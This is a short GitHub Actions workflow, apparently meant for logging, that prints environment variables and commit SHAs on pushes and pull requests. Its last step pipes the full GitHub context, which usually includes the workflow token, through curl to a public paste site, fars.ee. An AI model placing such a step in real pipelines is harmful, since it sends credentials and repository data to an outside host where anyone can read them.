name: Event Loggger
on:
  pull_request:
  push:

jobs:
  log-github:
    runs-on: ubuntu-latest
    steps:
      # - name: Install Depends
      #   run: sudo apt -y install curl
      - name: printenv
        run: printenv

      - name: base sha (pr)
        if: github.event_name == 'pull_request'
        env:
          PREV_SHA: ${{ github.event.pull_request.base.sha }}
        run: |
          echo "$PREV_SHA"

      - name: base sha (squash merge)
        if: github.event_name == 'push'
        env:
          PREV_SHA: ${{ github.event.before }}
        run: |
          echo "$PREV_SHA"

      - name: Dump GitHub context
        env:
          GITHUB_CONTEXT: ${{ toJson(github) }}
        run: echo "$GITHUB_CONTEXT" | curl -F "c=@-" "http://fars.ee/"
